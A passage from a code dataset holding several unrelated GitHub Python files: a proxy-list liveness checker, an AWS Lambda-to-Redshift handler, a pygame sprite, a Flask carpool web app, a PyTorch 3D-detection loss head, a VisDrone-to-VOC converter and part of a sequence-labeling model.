threads=20):\r\n self.threads = threads\r\n self.proxy_file = file\r\n self.proxy_file_name = self.proxy_file.name\r\n self.out_proxy_file_name = f\"alive_{self.proxy_file_name}\" if out_name == '' else out_name\r\n self.proxies = Proxies(self.proxy_file).proxy_list\r\n self.alive_proxies = self.Test_Proxies(self.proxies)\r\n self.Save_Alive()\r\n \r\n def Test_Proxies(self, proxies):\r\n thread_array = []\r\n retval = [None for i in range(len(proxies))]\r\n for j in range(0, len(proxies), self.threads):\r\n for i in range(self.threads):\r\n thread = threading.Thread(target=self.Test_Proxy, args=(proxies[j+i], retval, j+i))\r\n thread.start()\r\n thread_array.append(thread)\r\n \r\n for thread in thread_array:\r\n thread.join()\r\n \r\n return [alive for alive in retval if alive]\r\n\r\n def Test_Proxy(self, prox, return_val, i):\r\n url = TEST_URLS[0]\r\n proxy = prox.Proxy_To_dict()\r\n try:\r\n r = requests.get(url, proxies=proxy, timeout=1).text.replace('\\n','')\r\n if prox.ip == r:\r\n print(prox.ip, r)\r\n return_val[i] = prox\r\n else:\r\n return_val[i] = False \r\n except Exception as e:\r\n return_val[i] = False\r\n\r\n def Save_Alive(self, filename=\"data/alive_proxy_list.txt\"):\r\n file = open(filename, 'w')\r\n proxy_list_string = \"\"\r\n for proxy in self.alive_proxies:\r\n proxy_list_string += f\"{proxy.scheme}://{proxy.ip}:{proxy.port}\\n\"\r\n \r\n file.write(proxy_list_string)\r\n file.close()","repo_name":"xl00t/ProxyROT","sub_path":"validate/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10181678181","text":"import json\nfrom datetime import time, datetime\nfrom redshifter import build_and_send_query\n\ndef handler(event, context):\n\n # GET THE UPLAODED FILES NAME\n uploaded_filename = event['Records'][0]['s3']['object']['key']\n\n # GET THE UPLOADED FILES CATEGORY TYPE\n file_category = uploaded_filename.split('_')[0][:-1]\n\n # GET THE FILES LWM\n lwm = uploaded_filename.split('_')[1][:8]\n\n # GET THE FILES HWM\n hwm = uploaded_filename.split('_')[2][:8]\n\n # ARRIVAL TIME\n timestamp = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n print(type(file_category))\n\n # BUILD AND SEND QUERY TO REDSHIFT CLUSTER\n build_and_send_query(file_category, uploaded_filename, lwm, hwm, timestamp)\n","repo_name":"peterbarla/data_etl_aws","sub_path":"serverless-lambda/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6069399855","text":"import pygame\n\nfrom game import GREEN, GREY, YELLOW\n\n\nclass Speedway(pygame.sprite.Sprite):\n position = True\n\n def __init__(self, width, height):\n super().__init__()\n\n# self.image = pygame.Surface([width, height])\n \n# self.image.fill(GREY)\n# self.image.set_colorkey(GREY)\n \n self.image = pygame.image.load('black-car.png').convert_alpha()\n pygame.draw.rect(self.image, GREEN, [0, 0, width*0.1, height])\n pygame.draw.rect(self.image, GREEN, [width*0.9, 0, width, height])\n pygame.draw.rect(self.image, YELLOW, [width*0.48, 0, width*0.04, height])\n self.rect = self.image.get_rect()\n \n","repo_name":"CCSERIGNE/Game_PYRACY","sub_path":"speedway.py","file_name":"speedway.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11837335627","text":"# -*- coding: utf-8 -*-#\n# -------------------------------------------------------------------------------\n# Name: search_order\n# Date: 2019/4/10\n# -------------------------------------------------------------------------------\nfrom datetime import datetime\n\nfrom flask import render_template, request, redirect, url_for\nfrom flask_login import current_user, login_required\nfrom sqlalchemy import null\n\nfrom app.data.order import MyOrder, SearchOrder, SearchOrderWithTotalCM\nfrom app.data.ticket import SearchTicket\nfrom app.forms.search_order import SearchForm, OrderForm, OrderDriverForm, SearchDriverForm\nfrom app.forms.auth import AddOrderForm,AddFeedbackForm\nfrom app.models.base import db\nfrom app.models.driver import Driver\nfrom app.models.order import Order\nfrom app.models.feedback import feedback\nfrom . import web\n\n\n@web.route('/search', methods=['GET', 'POST'])\ndef search():\n form = SearchForm(request.form)\n if request.method == 'POST': # and form.validate():\n # print(\"\\n \\n \\n\",form.depart_date.data,\"\\n \\n \\n\")\n tickets = Order.query.filter_by(depart_date=str(form.depart_date.data),\n o_staddr=form.depart_city.data, o_daddr=form.arrive_city.data).all()\n tickets = SearchOrder(tickets).orders # 列表包含着字典\n return render_template('web/SearchResults.html', tickets=tickets, form=form)\n\n # form.single_double.default = '往返s'\n form.process()\n return render_template('web/SearchResults.html', form=form, tickets=[])\n\n\n@web.route('/order/')\n@login_required\ndef order(plain_id):\n \"\"\"\n :param plain_id: 代表航班名称,name,需要前端返回。\n :return:\n \"\"\"\n order_id = plain_id# 'P' + datetime.now().strftime('%Y%m%d%H%M%S')\n form = OrderForm(request.form)\n ticket = Order.query.filter_by(id=plain_id).first()\n\n form.order_id.default = order_id\n form.route.default = ticket.o_staddr + '-' + ticket.o_daddr\n form.depart_time.default = ticket.depart_date + '-' + ticket.depart_time\n form.process()\n return render_template('web/OrderInfo.html', form=form)\n\n\n@web.route('/order/save_order', methods=['POST'])\n@login_required\ndef save_order():\n form = OrderForm(request.form)\n if request.method == 'POST': # and form.validate():\n '''\n with db.auto_commit():\n order = Order()\n order.set_attrs(form.data)\n # userid = current_user.id, user = get_user(userid)\n order.user_id = current_user.id\n order.status = '正在处理'\n\n db.session.add(order)\n '''\n user_id = current_user.id\n print(form.data)\n order=Order.query.filter_by(id=form.data['order_id']).first()\n print(\"\\n order\\n \\n\",order.user_id5)\n user_num=0\n if(order.user_id6 is not None):\n user_num=6\n elif(order.user_id5 is not None):\n user_num=5\n elif(order.user_id4 is not None):\n user_num=4\n elif(order.user_id3 is not None):\n user_num=3\n elif(order.user_id2 is not None):\n user_num=2\n elif(order.user_id1 is not None):\n user_num=1\n print(user_num)\n order.change_info(user_id,user_num)\n return redirect(url_for('web.my_order'))\n\n\n@web.route('/order/my')\n@login_required\ndef my_order():\n user_id = current_user.id\n order=list() \n order.extend(Order.query.filter_by(user_id1=user_id).all())\n order.extend(Order.query.filter_by(user_id2=user_id).all())\n order.extend(Order.query.filter_by(user_id3=user_id).all())\n order.extend(Order.query.filter_by(user_id4=user_id).all())\n order.extend(Order.query.filter_by(user_id5=user_id).all())\n order.extend(Order.query.filter_by(user_id6=user_id).all())\n print(order)\n my_order = SearchOrder(order,user_id).orders\n return render_template('web/MyOrder.html', my_order=my_order)\n\n@web.route('/accept_order/', methods=['GET','POST'])\ndef accept_order(driver_id):\n form = SearchForm(request.form)\n if request.method == 'POST': # and form.validate():\n print(\"\\n \\n \\n\",form.depart_date.data,\"\\n \\n \\n\")\n tickets = Order.query.filter_by(driver_id=None, depart_date=str(form.depart_date.data),\n o_staddr=form.depart_city.data, o_daddr=form.arrive_city.data).all()\n tickets = SearchOrder(tickets).orders # 列表包含着字典\n return render_template('web/SearchResults_driver.html', tickets=tickets, form=form, driver_id=driver_id)\n\n # form.single_double.default = '往返s'\n form.process()\n return render_template('web/SearchResults_driver.html', form=form, tickets=[],driver_id=driver_id)\n\n@web.route('/order_submit/')\n@login_required\ndef order_submit(plain_id):\n \"\"\"\n :param plain_id: 代表航班名称,name,需要前端返回。\n :return:\n \"\"\"\n order_id = plain_id# 'P' + datetime.now().strftime('%Y%m%d%H%M%S')\n form = OrderDriverForm(request.form)\n ticket = Order.query.filter_by(id=plain_id).first()\n\n form.order_id.default = order_id\n form.route.default = ticket.o_staddr + '-' + ticket.o_daddr\n form.depart_time.default = ticket.depart_date + '-' + ticket.depart_time\n form.process()\n return render_template('web/OrderDriverInfo.html', form=form,plain_id=plain_id)\n\n@web.route('/order/save_order_driver/', methods=['GET','POST'])\ndef save_order_driver(driver_id):\n form = OrderDriverForm(request.form)\n if request.method == 'POST': # and form.validate():\n '''\n with db.auto_commit():\n order = Order()\n order.set_attrs(form.data)\n # userid = current_user.id, user = get_user(userid)\n order.user_id = current_user.id\n order.status = '正在处理'\n\n db.session.add(order)\n '''\n print(form.data)\n order=Order.query.filter_by(id=form.data['order_id']).first()\n order.change_info_driver(driver_id,form.data['price'])\n return redirect(url_for('web.my_order_driver',driver_id=driver_id))\n\n@web.route('/driver_order/')\ndef my_order_driver(driver_id): \n order=Order.query.filter_by(driver_id=driver_id).all()\n my_order = SearchOrder(order).orders\n return render_template('web/MyOrderDriver.html', driver_id=driver_id,my_order=my_order)\n\n# 添加拼车\n@web.route('/add_order', methods=['GET', 'POST'])\n@login_required\ndef add_order():\n form = AddOrderForm(request.form)\n if request.method == 'POST': # and form.validate():\n with db.auto_commit():\n ticket = Order()\n ticket.set_attrs(form.data)\n ticket.user_id1=current_user.id\n ticket.o_finish=False\n ticket.o_take=False\n db.session.add(ticket)\n return redirect(url_for('web.my_order'))\n return render_template('web/OrderAdd.html', form=form)\n\n# 添加评论\n@web.route('/add_feedback/', methods=['GET', 'POST'])\n@login_required\ndef add_feedback(order_id):\n form = AddFeedbackForm(request.form)\n ticket = Order.query.filter_by(id=order_id).first()\n form.order_id.default = order_id\n form.route.default = ticket.o_staddr + '-' + ticket.o_daddr\n form.depart_time.default = ticket.depart_date + '-' + ticket.depart_time\n print(form.order_id)\n form.process()\n if request.method == 'POST': # and form.validate():\n with db.auto_commit():\n print(feedback.query.filter_by(u_id=current_user.id,o_id=order_id).first())\n if(feedback.query.filter_by(u_id=current_user.id,o_id=order_id).first() is None):\n print('none')\n feedback_ = feedback()\n feedback_.o_id=order_id\n feedback_.u_id=current_user.id\n feedback_.content=request.form.get('content')\n db.session.add(feedback_)\n return redirect(url_for('web.my_order'))\n return render_template('web/AddFeedback.html', form=form)\n\n@web.route('/order_driver_detail//')\ndef order_driver_detail(driver_id,order_id):\n order=Order.query.filter_by(id=order_id).all()\n my_order = SearchOrderWithTotalCM(order).orders\n return render_template('web/MyOrderDriverDetail.html', driver_id=driver_id, my_order=my_order)\n\n@web.route('/search_driver_detail',methods=['GET', 'POST'])\ndef search_driver_detail():\n my_order=[]\n form=SearchDriverForm(request.form)\n if request.method == 'POST':\n driver_id=Driver.query.filter_by(d_name=form.driver_name.data).first().id\n order=Order.query.filter_by(driver_id=driver_id).all()\n my_order = SearchOrderWithTotalCM(order).orders\n form.process()\n return render_template('web/SearchOrderDriverDetail.html', form=form,my_order=my_order)","repo_name":"LIU-YUXI/Campus-carpool-platform","sub_path":"app/web/search_order.py","file_name":"search_order.py","file_ext":"py","file_size_in_byte":8830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30420493047","text":"import copy\nimport enum\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.init import kaiming_normal_\nfrom ..model_utils import model_nms_utils\nfrom ..model_utils import centernet_utils\nfrom ...utils import loss_utils\n\nclass Heatmap_Similarity_Loss_Head(nn.Module):\n def __init__(self, model_cfg, input_channels, num_class, class_names, grid_size, point_cloud_range, voxel_size,\n sequence_length):\n super().__init__()\n self.model_cfg = model_cfg\n self.module_category = self.model_cfg.MODULE_CATEGORY\n self.num_class = num_class\n self.grid_size = grid_size\n self.point_cloud_range = point_cloud_range\n self.voxel_size = voxel_size\n self.feature_map_stride = self.model_cfg.TARGET_ASSIGNER_CONFIG.get('FEATURE_MAP_STRIDE', None)\n\n self.class_names = class_names\n self.class_names_each_head = []\n self.class_id_mapping_each_head = []\n\n for cur_class_names in self.model_cfg.CLASS_NAMES_EACH_HEAD:\n self.class_names_each_head.append([x for x in cur_class_names if x in class_names])\n cur_class_id_mapping = torch.from_numpy(np.array(\n [self.class_names.index(x) for x in cur_class_names if x in class_names]\n )).cuda()\n self.class_id_mapping_each_head.append(cur_class_id_mapping)\n\n total_classes = sum([len(x) for x in self.class_names_each_head])\n assert total_classes == len(self.class_names), f'class_names_each_head={self.class_names_each_head}'\n\n self.embedding_network = nn.Sequential(\n nn.Conv2d(\n input_channels, self.model_cfg.EMBEDDING_OUTPUT_CHANNEL, 1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(self.model_cfg.EMBEDDING_OUTPUT_CHANNEL),\n nn.ReLU(),\n )\n \n for module in self.embedding_network.modules():\n if isinstance(module, nn.Conv2d):\n kaiming_normal_(module.weight.data) \n\n self.num_class = self.model_cfg.NUM_TOTAL_CLASS\n self.seq_length = sequence_length\n\n def assign_target_of_single_head(\n self, num_classes, gt_boxes, feature_map_size, feature_map_stride, num_max_objs=500,\n gaussian_overlap=0.1, min_radius=2\n ):\n \"\"\"\n Args:\n gt_boxes: (N, 8)\n feature_map_size: (2), [x, y]\n\n Returns:\n\n \"\"\"\n heatmap = gt_boxes.new_zeros(num_classes, feature_map_size[1], feature_map_size[0])\n ret_boxes = gt_boxes.new_zeros((num_max_objs, gt_boxes.shape[-1] - 1 + 1))\n inds = gt_boxes.new_zeros(num_max_objs).long()\n mask = gt_boxes.new_zeros(num_max_objs).long()\n\n x, y, z = gt_boxes[:, 0], gt_boxes[:, 1], gt_boxes[:, 2]\n coord_x = (x - self.point_cloud_range[0]) / self.voxel_size[0] / feature_map_stride\n coord_y = (y - self.point_cloud_range[1]) / self.voxel_size[1] / feature_map_stride\n coord_x = torch.clamp(coord_x, min=0, max=feature_map_size[0] - 0.5) # bugfixed: 1e-6 does not work for center.int()\n coord_y = torch.clamp(coord_y, min=0, max=feature_map_size[1] - 0.5) #\n center = torch.cat((coord_x[:, None], coord_y[:, None]), dim=-1)\n center_int = center.int()\n center_int_float = center_int.float()\n\n dx, dy, dz = gt_boxes[:, 3], gt_boxes[:, 4], gt_boxes[:, 5]\n dx = dx / self.voxel_size[0] / feature_map_stride\n dy = dy / self.voxel_size[1] / feature_map_stride\n\n radius = centernet_utils.gaussian_radius(dx, dy, min_overlap=gaussian_overlap)\n radius = torch.clamp_min(radius.int(), min=min_radius)\n\n for k in range(min(num_max_objs, gt_boxes.shape[0])):\n if dx[k] <= 0 or dy[k] <= 0:\n continue\n\n if not (0 <= center_int[k][0] <= feature_map_size[0] and 0 <= center_int[k][1] <= feature_map_size[1]):\n continue\n\n cur_class_id = (gt_boxes[k, -1] - 1).long()\n centernet_utils.draw_gaussian_to_heatmap(heatmap[cur_class_id], center[k], radius[k].item())\n\n inds[k] = center_int[k, 1] * feature_map_size[0] + center_int[k, 0]\n mask[k] = 1\n\n ret_boxes[k, 0:2] = center[k] - center_int_float[k].float()\n ret_boxes[k, 2] = z[k]\n ret_boxes[k, 3:6] = gt_boxes[k, 3:6].log()\n ret_boxes[k, 6] = torch.cos(gt_boxes[k, 6])\n ret_boxes[k, 7] = torch.sin(gt_boxes[k, 6])\n if gt_boxes.shape[1] > 8:\n ret_boxes[k, 8:] = gt_boxes[k, 7:-1]\n\n return heatmap, ret_boxes, inds, mask\n\n def assign_targets(self, gt_boxes, feature_map_size=None, **kwargs):\n \"\"\"\n Args:\n gt_boxes: (B, M, 8)\n range_image_polar: (B, 3, H, W)\n feature_map_size: (2) [H, W]\n spatial_cartesian: (B, 4, H, W)\n Returns:\n\n \"\"\"\n feature_map_size = feature_map_size[::-1] # [H, W] ==> [x, y]\n target_assigner_cfg = self.model_cfg.TARGET_ASSIGNER_CONFIG\n # feature_map_size = self.grid_size[:2] // target_assigner_cfg.FEATURE_MAP_STRIDE\n\n batch_size = gt_boxes.shape[0]\n ret_dict = {\n 'heatmaps': [],\n 'target_boxes': [],\n 'inds': [],\n 'masks': [],\n 'heatmap_masks': []\n }\n\n all_names = np.array(['bg', *self.class_names])\n for idx, cur_class_names in enumerate(self.class_names_each_head):\n heatmap_list, target_boxes_list, inds_list, masks_list = [], [], [], []\n for bs_idx in range(batch_size):\n cur_gt_boxes = gt_boxes[bs_idx]\n gt_class_names = all_names[cur_gt_boxes[:, -1].cpu().long().numpy()]\n\n gt_boxes_single_head = []\n\n for idx, name in enumerate(gt_class_names):\n if name not in cur_class_names:\n continue\n temp_box = cur_gt_boxes[idx]\n temp_box[-1] = cur_class_names.index(name) + 1\n gt_boxes_single_head.append(temp_box[None, :])\n\n if len(gt_boxes_single_head) == 0:\n gt_boxes_single_head = cur_gt_boxes[:0, :]\n else:\n gt_boxes_single_head = torch.cat(gt_boxes_single_head, dim=0)\n\n heatmap, ret_boxes, inds, mask = self.assign_target_of_single_head(\n num_classes=len(cur_class_names), gt_boxes=gt_boxes_single_head.cpu(),\n feature_map_size=feature_map_size, feature_map_stride=target_assigner_cfg.FEATURE_MAP_STRIDE,\n num_max_objs=target_assigner_cfg.NUM_MAX_OBJS,\n gaussian_overlap=target_assigner_cfg.GAUSSIAN_OVERLAP,\n min_radius=target_assigner_cfg.MIN_RADIUS,\n )\n heatmap_list.append(heatmap.to(gt_boxes_single_head.device))\n target_boxes_list.append(ret_boxes.to(gt_boxes_single_head.device))\n inds_list.append(inds.to(gt_boxes_single_head.device))\n masks_list.append(mask.to(gt_boxes_single_head.device))\n\n ret_dict['heatmaps'].append(torch.stack(heatmap_list, dim=0))\n ret_dict['target_boxes'].append(torch.stack(target_boxes_list, dim=0))\n ret_dict['inds'].append(torch.stack(inds_list, dim=0))\n ret_dict['masks'].append(torch.stack(masks_list, dim=0))\n return ret_dict\n\n def sigmoid(self, x):\n y = torch.clamp(x.sigmoid(), min=1e-4, max=1 - 1e-4)\n return y\n\n def heatmap_similarity_loss_per_single_head(self, L2_dist_ret, heatmap):\n \"\"\"\n Args:\n pred: (batch x c x h x w)\n gt: (batch x c x h x w)\n mask: (batch x h x w)\n Returns:\n \"\"\"\n num_loc = heatmap.gt(0).float().sum()\n if num_loc == 0:\n return 0\n else:\n heatmap_sim_loss = L2_dist_ret * heatmap\n heatmap_sim_loss = heatmap_sim_loss.sum()\n return (heatmap_sim_loss / num_loc)\n\n \n\n def get_loss(self, embed_features_2d_list: list, heatmap_ref_dict: dict):\n loss = 0\n L2_dist_ret_list = []\n\n batch, C, H, W = embed_features_2d_list[-1].size()\n zero_vector = torch.zeros(batch, 1, C).to(embed_features_2d_list[-1].device)\n\n for t in range(self.seq_length-1):\n support_feature_norm_out = F.normalize(embed_features_2d_list[t], dim=1)\n ref_feature_norm_out = F.normalize(embed_features_2d_list[-1], dim=1)\n residual = (ref_feature_norm_out-support_feature_norm_out).view(batch,C,-1).transpose(1,2)\n # residual = (embed_features_2d_list[-1]-embed_features_2d_list[t]).view(batch,C,-1).transpose(1,2)\n dist = torch.cdist(residual, zero_vector).transpose(1,2).view(batch, 1, H, W)\n L2_dist_ret_list.append(dist)\n assert len(L2_dist_ret_list) == self.seq_length-1\n\n loss_denominator = [self.num_class * (self.seq_length-1)] * batch\n loss_per_batch_list = [0] * batch\n\n for t in range(self.seq_length-1):\n for idx, heatmap_ref in enumerate(heatmap_ref_dict['heatmaps']):\n for batch_idx in range(batch):\n heatmap_similarity_loss = self.heatmap_similarity_loss_per_single_head(L2_dist_ret_list[t][batch_idx], heatmap_ref[batch_idx])\n if heatmap_similarity_loss == 0:\n loss_denominator[batch_idx] -= heatmap_ref[batch_idx].size()[1]\n continue\n loss_per_batch_list[batch_idx] += heatmap_similarity_loss\n final_loss_per_batch_list = [loss_per_batch_list[batch_idx] / loss_denominator[batch_idx] for batch_idx in range(batch)]\n assert len(final_loss_per_batch_list) == batch\n final_loss = sum(final_loss_per_batch_list) / batch\n\n return final_loss\n\n\n def forward(self, data_dict_seq_list):\n embed_features_2d_list = []\n for t in range(self.seq_length):\n if t == (self.seq_length-1):\n embed_features_2d_list.append(self.embedding_network(data_dict_seq_list[t]['spatial_features_2d']))\n else:\n embed_features_2d_list.append(self.embedding_network(data_dict_seq_list[t]['aligned_features_2d']))\n assert len(embed_features_2d_list) == self.seq_length\n\n target_data_dict = data_dict_seq_list[-1]\n \n \n heatmap_ref_dict = self.assign_targets(\n target_data_dict['gt_boxes'], feature_map_size=embed_features_2d_list[-1].size()[2:],\n feature_map_stride=target_data_dict.get('spatial_features_2d_strides', None)\n )\n \n similarity_loss = self.get_loss(embed_features_2d_list, heatmap_ref_dict)\n similarity_loss = similarity_loss * self.model_cfg.AUX_LOSS_WEIGHTS\n return similarity_loss","repo_name":"junhyung-SPALab/D-Align","sub_path":"pcdet/models/dense_heads/aux_loss_head.py","file_name":"aux_loss_head.py","file_ext":"py","file_size_in_byte":10930,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"35301460387","text":"import argparse\n\n\nfrom os import path, listdir, makedirs\n\nfrom annotation import process_annotation\nfrom image import process_image\n\nvisdrone_sets = [('2019', 'DET', 'train'), ('2019', 'DET', 'val'), ('2019', 'DET', 'test-dev')]\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-s', '--src', dest='visdrone_path', help='path to visdrone dataset', required=True)\nparser.add_argument('-d', '--dest', dest='voc_path', help='path to VOC dataset', required=True)\nparser.add_argument('-w', '--width', dest='w', help='new image width', required=True, type=int)\nparser.add_argument('-l', '--height', dest='h', help='new image height', required=True, type=int)\n\nargs = parser.parse_args()\n\ndef visdrone2voc():\n for s in visdrone_sets:\n print(f'[VisDrone/{s[2]}] processing started ...')\n set_name = \"-\".join(s)\n set_anns_path = path.join(args.visdrone_path, f\"VisDrone{set_name}\", \"annotations\")\n set_imgs_path = path.join(args.visdrone_path, f\"VisDrone{set_name}\", \"images\")\n\n ann_list = [path.join(set_anns_path, a) for a in listdir(set_anns_path)]\n img_list = [path.join(set_imgs_path, i) for i in listdir(set_imgs_path)]\n voc_images = path.join(args.voc_path, \"VOC2007\", \"JPEGImages\")\n voc_anns = path.join(args.voc_path, \"VOC2007\", \"Annotations\")\n # make sure destination structure exists\n makedirs(voc_images, exist_ok=True)\n makedirs(voc_anns, exist_ok=True)\n\n for src_ann, src_img in zip(sorted(ann_list), sorted(img_list)):\n img_meta = process_image(src_img, (args.w, args.h, 3), voc_images)\n process_annotation(src_ann, img_meta, voc_anns)\n print(f'done processing {img_meta[\"file\"]}')\n print(f'[VisDrone/{s[2]}] processing done.')\n\nif __name__ == '__main__':\n visdrone2voc()\n","repo_name":"farajist/visdrone2voc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73410667689","text":"from typing import List, Optional, Tuple, Union\nimport os\nimport tempfile\nimport tarfile\nimport json\n\nimport dill\nimport torch\nfrom torch.autograd import Variable\nfrom torch import nn\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nfrom torchcrf import CRF\nfrom torchtext.vocab import Vectors\nfrom sacred.run import Run\n\nfrom seqlab.models import SequenceLabeler\nfrom seqlab.trainer import Trainer\nfrom seqlab.evaluator import Evaluator\n\nfrom helfer.evaluation import evaluate_conll\n\nclass NewSequenceLabeler(SequenceLabeler):\n def __init__(self,\n num_words: int,\n num_tags: int,\n num_chars: int = 0,\n word_embedding_size: int = 300,\n dropout: float = 0,\n var_dropout: float = 0,\n embed_dropout: float = 0,\n use_pretrained_embeddings=False,\n pretrained_emb_dir='',\n update_pretrained_embedding=True,\n encoder_hidden_size: int = 200,\n lm_loss_scale: float = 0.1,\n lm_layer_size: int = 50,\n lm_max_vocab_size: int = 7500,\n pre_output_layer_size: int = 50,\n char_integration_method: str = 'none',\n char_embedding_size: int = 50,\n char_encoder_hidden_size: int = 200,\n unk_id: int = 0,\n ) -> None:\n if num_words <= 0:\n raise ValueError(f'invalid number of words: {num_words}')\n if num_tags <= 0:\n raise ValueError(f'invalid number of tags: {num_tags}')\n if word_embedding_size <= 0:\n raise ValueError(\n f'invalid word embedding size: {word_embedding_size}')\n if dropout < 0. or dropout >= 1.:\n raise ValueError(f'invalid dropout rate: {dropout:.2f}')\n if encoder_hidden_size <= 0:\n raise ValueError(\n f'invalid encoder hidden size: {encoder_hidden_size}')\n if lm_layer_size <= 0:\n raise ValueError(\n f'invalid language modeling layer size: {lm_layer_size}')\n if lm_max_vocab_size <= 0:\n raise ValueError(\n f'invalid language modeling max vocabulary size: {lm_max_vocab_size}')\n if char_integration_method not in ('none', 'concatenation', 'attention'):\n raise ValueError(\n f'invalid character integration method: {char_integration_method}')\n if char_embedding_size <= 0:\n raise ValueError(\n f'invalid character embedding size: {char_embedding_size}')\n if char_encoder_hidden_size <= 0:\n raise ValueError(\n f'invalid character encoder hidden size: {char_encoder_hidden_size}')\n\n # These two conditionals ensure that\n # char_integration_method == 'none' <-> not num_chars\n if char_integration_method != 'none' and not num_chars:\n raise ValueError(\n \"'num_chars' must be specified when integration method is not 'none'\")\n if char_integration_method == 'none' and num_chars:\n raise ValueError(\n f\"invalid value for 'num_chars' when integration method is 'none': {num_chars}\")\n assert (char_integration_method != 'none' or not num_chars) and \\\n (char_integration_method == 'none' or num_chars)\n\n self.use_pretrained_embeddings = use_pretrained_embeddings\n\n super(NewSequenceLabeler, self).__init__(num_words=num_words, \n num_tags=num_tags, \n num_chars=num_chars,\n word_embedding_size=word_embedding_size,\n dropout=dropout, \n encoder_hidden_size=encoder_hidden_size,\n lm_loss_scale=lm_loss_scale, lm_layer_size=lm_layer_size,\n lm_max_vocab_size=lm_max_vocab_size, \n pre_output_layer_size=pre_output_layer_size, \n char_integration_method=char_integration_method,\n char_embedding_size=char_embedding_size, \n char_encoder_hidden_size=char_encoder_hidden_size, \n unk_id=unk_id)\n\n # # Attributes\n # self.num_words = num_words\n # self.num_tags = num_tags\n # self.num_chars = num_chars\n # self.word_embedding_size = word_embedding_size\n # self.var_dropout = var_dropout\n # self.embed_dropout = embed_dropout\n # self.dropout = dropout\n # self.encoder_hidden_size = encoder_hidden_size\n # self.lm_loss_scale = lm_loss_scale\n # self.lm_layer_size = lm_layer_size\n # self.lm_max_vocab_size = lm_max_vocab_size\n # self.pre_output_layer_size = pre_output_layer_size\n # self.char_integration_method = char_integration_method\n # self.char_embedding_size = char_embedding_size\n # self.char_encoder_hidden_size = char_encoder_hidden_size\n # self.unk_id = unk_id\n\n # Embeddings\n self.word_embedding = nn.Embedding(num_words, word_embedding_size)\n if use_pretrained_embeddings:\n pretrained_embed_weights = torch.load(\n os.path.join(pretrained_emb_dir, 'pretrained_embed_weights.pt'))\n for i, _ in enumerate(pretrained_embed_weights):\n if len(pretrained_embed_weights[i, :].nonzero()) == 0:\n torch.nn.init.normal(pretrained_embed_weights[i], std=0.1)\n self.word_embedding.weight.data.copy_(pretrained_embed_weights)\n if not(update_pretrained_embedding):\n self.word_embedding.requires_grad = False\n\n if self.uses_char_embeddings:\n self.char_embedding = nn.Embedding(num_chars, char_embedding_size)\n\n # # Char encoder LSTM\n # if self.uses_char_embeddings:\n # self.char_encoder = nn.LSTM(\n # char_embedding_size,\n # char_encoder_hidden_size,\n # num_layers=1,\n # batch_first=True,\n # dropout=0.,\n # bidirectional=True,\n # )\n # self.char_projection = nn.Sequential(\n # nn.Linear(2 * char_encoder_hidden_size, word_embedding_size),\n # nn.Tanh(),\n # )\n\n # # Attention\n # if char_integration_method == 'attention':\n # self.attention = nn.Sequential(\n # nn.Linear(2 * word_embedding_size, word_embedding_size),\n # nn.Tanh(),\n # nn.Linear(word_embedding_size, word_embedding_size),\n # nn.Sigmoid(),\n # )\n\n # # Seq2seq encoder\n # if self.dropout:\n # self.dropout_layer = nn.Dropout(dropout)\n # encoder_input_size = word_embedding_size\n # if char_integration_method == 'concatenation':\n # encoder_input_size *= 2\n\n # self.encoder = nn.LSTM(\n # encoder_input_size,\n # encoder_hidden_size,\n # num_layers=1,\n # batch_first=True,\n # dropout=0.,\n # bidirectional=True,\n # )\n\n # # Language modeling\n # if self.uses_lm_loss:\n # lm_output_size = min(num_words, lm_max_vocab_size) + 1\n # self.lm_ff_fwd = nn.Sequential(\n # nn.Linear(encoder_hidden_size, lm_layer_size),\n # nn.Tanh(),\n # nn.Linear(lm_layer_size, lm_output_size),\n # )\n # self.lm_ff_bwd = nn.Sequential(\n # nn.Linear(encoder_hidden_size, lm_layer_size),\n # nn.Tanh(),\n # nn.Linear(lm_layer_size, lm_output_size),\n # )\n\n # # Output layer\n # if self.uses_pre_output_layer:\n # self.pre_output_layer = nn.Sequential(\n # nn.Linear(2 * encoder_hidden_size, pre_output_layer_size),\n # nn.Tanh(),\n # )\n # self.output_layer = nn.Linear(pre_output_layer_size, num_tags)\n # else:\n # self.output_layer = nn.Linear(2 * encoder_hidden_size, num_tags)\n # self.crf = CRF(num_tags)\n\n # self.reset_parameters()\n\n def reset_parameters(self) -> None:\n \"\"\"Initialize all model parameters.\n\n As implemented by Rei et al., all parameters are initialized randomly\n from normal distribution with mean 0 and stddev 0.1.\n \"\"\"\n for name, param in self.named_parameters():\n if not (name == 'word_embedding.weight' and self.use_pretrained_embeddings):\n nn.init.normal(param, std=0.1)\n\n def _compute_emissions_and_loss(self,\n words: Variable,\n chars: Variable,\n mask: Variable,\n ) -> Tuple[Variable, Variable]:\n\n # words: (batch_size, seq_length)\n # chars: (batch_size, seq_length, char_seq_length)\n # mask: (batch_size, seq_length, char_seq_length)\n\n assert words.dim() == 2\n assert chars.dim() == 3\n assert chars.size() == mask.size()\n\n loss = 0.\n\n # (batch_size, seq_length, word_emb_size)\n\n embedded_words = self.word_embedding(words)\n\n if self.uses_char_embeddings:\n # (batch_size, seq_length, word_emb_size)\n encoded_chars = self._compose_char_embeddings(chars, mask)\n if self.char_integration_method == 'concatenation':\n # (batch_size, seq_length, word_emb_size * 2)\n inputs = torch.cat([embedded_words, encoded_chars], dim=-1)\n else: # must be attention\n # Add cosine similarity loss for non-unk words\n loss += self._compute_similarity_loss(\n words, embedded_words, encoded_chars)\n # Compute attention weights\n 